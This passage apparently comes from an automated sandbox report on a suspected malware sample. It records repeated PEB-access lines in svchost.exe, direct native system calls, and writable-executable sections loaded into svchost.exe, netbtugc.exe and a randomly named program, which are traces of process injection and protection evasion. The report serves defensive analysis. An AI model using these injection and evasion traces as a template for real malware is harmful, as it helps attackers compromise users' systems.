            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6500 mov eax, dword ptr fs:[00000030h]2_2_00BD6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48550 mov eax, dword ptr fs:[00000030h]2_2_00B48550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48550 mov eax, dword ptr fs:[00000030h]2_2_00B48550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B766B0 mov eax, dword ptr fs:[00000030h]2_2_00B766B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C6A6 mov eax, dword ptr fs:[00000030h]2_2_00B7C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44690 mov eax, dword ptr fs:[00000030h]2_2_00B44690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44690 mov eax, dword ptr fs:[00000030h]2_2_00B44690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC06F1 mov eax, dword ptr fs:[00000030h]2_2_00BC06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC06F1 mov eax, dword ptr fs:[00000030h]2_2_00BC06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A6C7 mov ebx, dword ptr fs:[00000030h]2_2_00B7A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A6C7 mov eax, dword ptr fs:[00000030h]2_2_00B7A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E627 mov eax, dword ptr fs:[00000030h]2_2_00B5E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B76620 mov eax, dword ptr fs:[00000030h]2_2_00B76620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78620 mov eax, dword ptr fs:[00000030h]2_2_00B78620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4262C mov eax, dword ptr fs:[00000030h]2_2_00B4262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82619 mov eax, dword ptr fs:[00000030h]2_2_00B82619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0866E mov eax, dword ptr fs:[00000030h]2_2_00C0866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0866E mov eax, dword ptr fs:[00000030h]2_2_00C0866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE609 mov eax, dword ptr fs:[00000030h]2_2_00BBE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B72674 mov eax, dword ptr fs:[00000030h]2_2_00B72674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A660 mov eax, dword ptr fs:[00000030h]2_2_00B7A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A660 mov eax, dword ptr fs:[00000030h]2_2_00B7A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5C640 mov eax, dword ptr fs:[00000030h]2_2_00B5C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B407AF mov eax, dword ptr fs:[00000030h]2_2_00B407AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF47A0 mov eax, dword ptr fs:[00000030h]2_2_00BF47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE678E mov eax, dword ptr fs:[00000030h]2_2_00BE678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B447FB mov eax, dword ptr fs:[00000030h]2_2_00B447FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B447FB mov eax, dword ptr fs:[00000030h]2_2_00B447FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE7E1 mov eax, dword ptr fs:[00000030h]2_2_00BCE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4C7C0 mov eax, dword ptr fs:[00000030h]2_2_00B4C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC07C3 mov eax, dword ptr fs:[00000030h]2_2_00BC07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov eax, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov ecx, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov eax, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBC730 mov eax, dword ptr fs:[00000030h]2_2_00BBC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C720 mov eax, dword ptr fs:[00000030h]2_2_00B7C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C720 mov eax, dword ptr fs:[00000030h]2_2_00B7C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40710 mov eax, dword ptr fs:[00000030h]2_2_00B40710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70710 mov eax, dword ptr fs:[00000030h]2_2_00B70710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C700 mov eax, dword ptr fs:[00000030h]2_2_00B7C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48770 mov eax, dword ptr fs:[00000030h]2_2_00B48770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE75D mov eax, dword ptr fs:[00000030h]2_2_00BCE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40750 mov eax, dword ptr fs:[00000030h]2_2_00B40750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82750 mov eax, dword ptr fs:[00000030h]2_2_00B82750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82750 mov eax, dword ptr fs:[00000030h]2_2_00B82750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC4755 mov eax, dword ptr fs:[00000030h]2_2_00BC4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov esi, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov eax, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov eax, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C108C0 mov eax, dword ptr fs:[00000030h]2_2_00C108C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC89D mov eax, dword ptr fs:[00000030h]2_2_00BCC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A8E4 mov eax, dword ptr fs:[00000030h]2_2_00C0A8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40887 mov eax, dword ptr fs:[00000030h]2_2_00B40887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C8F9 mov eax, dword ptr fs:[00000030h]2_2_00B7C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C8F9 mov eax, dword ptr fs:[00000030h]2_2_00B7C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E8C0 mov eax, dword ptr fs:[00000030h]2_2_00B6E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov ecx, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE483A mov eax, dword ptr fs:[00000030h]2_2_00BE483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE483A mov eax, dword ptr fs:[00000030h]2_2_00BE483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A830 mov eax, dword ptr fs:[00000030h]2_2_00B7A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC810 mov eax, dword ptr fs:[00000030h]2_2_00BCC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6870 mov eax, dword ptr fs:[00000030h]2_2_00BD6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6870 mov eax, dword ptr fs:[00000030h]2_2_00BD6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE872 mov eax, dword ptr fs:[00000030h]2_2_00BCE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE872 mov eax, dword ptr fs:[00000030h]2_2_00BCE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70854 mov eax, dword ptr fs:[00000030h]2_2_00B70854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44859 mov eax, dword ptr fs:[00000030h]2_2_00B44859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44859 mov eax, dword ptr fs:[00000030h]2_2_00B44859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B52840 mov ecx, dword ptr fs:[00000030h]2_2_00B52840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov esi, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov eax, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov eax, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A9D3 mov eax, dword ptr fs:[00000030h]2_2_00C0A9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B409AD mov eax, dword ptr fs:[00000030h]2_2_00B409AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B409AD mov eax, dword ptr fs:[00000030h]2_2_00B409AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B729F9 mov eax, dword ptr fs:[00000030h]2_2_00B729F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B729F9 mov eax, dword ptr fs:[00000030h]2_2_00B729F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE9E0 mov eax, dword ptr fs:[00000030h]2_2_00BCE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B749D0 mov eax, dword ptr fs:[00000030h]2_2_00B749D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD69C0 mov eax, dword ptr fs:[00000030h]2_2_00BD69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14940 mov eax, dword ptr fs:[00000030h]2_2_00C14940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC892A mov eax, dword ptr fs:[00000030h]2_2_00BC892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD892B mov eax, dword ptr fs:[00000030h]2_2_00BD892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38918 mov eax, dword ptr fs:[00000030h]2_2_00B38918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38918 mov eax, dword ptr fs:[00000030h]2_2_00B38918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC912 mov eax, dword ptr fs:[00000030h]2_2_00BCC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE908 mov eax, dword ptr fs:[00000030h]2_2_00BBE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE908 mov eax, dword ptr fs:[00000030h]2_2_00BBE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC97C mov eax, dword ptr fs:[00000030h]2_2_00BCC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4978 mov eax, dword ptr fs:[00000030h]2_2_00BE4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4978 mov eax, dword ptr fs:[00000030h]2_2_00BE4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov eax, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov edx, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov eax, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC0946 mov eax, dword ptr fs:[00000030h]2_2_00BC0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48AA0 mov eax, dword ptr fs:[00000030h]2_2_00B48AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48AA0 mov eax, dword ptr fs:[00000030h]2_2_00B48AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B96AA4 mov eax, dword ptr fs:[00000030h]2_2_00B96AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78A90 mov edx, dword ptr fs:[00000030h]2_2_00B78A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00C14A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B7AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B40AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B74AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B96ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B64A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B7CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B7CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B6EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BCCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BBCA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B7CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BEEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B50A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B50BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BF4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B48BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B6EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BCCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BEEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B40BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B60BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00C0AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00B6EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00C12B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000AA937 GetProcessHeap
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000A8E19 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe | native calls recorded as "Direct from" the given address (one per line, in report order):
    NtAllocateVirtualMemory: Direct from: 0x76EF48EC
    NtQueryAttributesFile: Direct from: 0x76EF2E6C
    NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
    NtQuerySystemInformation: Direct from: 0x76EF48CC
    NtOpenSection: Direct from: 0x76EF2E0C
    NtDeviceIoControlFile: Direct from: 0x76EF2AEC
    NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
    NtQueryInformationToken: Direct from: 0x76EF2CAC
    NtCreateFile: Direct from: 0x76EF2FEC
    NtOpenFile: Direct from: 0x76EF2DCC
    NtTerminateThread: Direct from: 0x76EF2FCC
    NtOpenKeyEx: Direct from: 0x76EF2B9C
    NtSetInformationProcess: Direct from: 0x76EF2C5C
    NtProtectVirtualMemory: Direct from: 0x76EF2F9C
    NtWriteVirtualMemory: Direct from: 0x76EF2E3C
    NtNotifyChangeKey: Direct from: 0x76EF3C2C
    NtCreateMutant: Direct from: 0x76EF35CC
    NtResumeThread: Direct from: 0x76EF36AC
    NtMapViewOfSection: Direct from: 0x76EF2D1C
    NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
    NtQuerySystemInformation: Direct from: 0x76EF2DFC
    NtReadFile: Direct from: 0x76EF2ADC
    NtDelayExecution: Direct from: 0x76EF2DDC
    NtQueryInformationProcess: Direct from: 0x76EF2C26
    NtResumeThread: Direct from: 0x76EF2FBC
    NtCreateUserProcess: Direct from: 0x76EF371C
    NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
    NtWriteVirtualMemory: Direct from: 0x76EF490C
    NtSetInformationThread: Direct from: 0x76EE63F9
    NtClose: Direct from: 0x76EF2B6C
    NtSetInformationThread: Direct from: 0x76EF2B4C
    NtReadVirtualMemory: Direct from: 0x76EF2E8C
    NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: read write
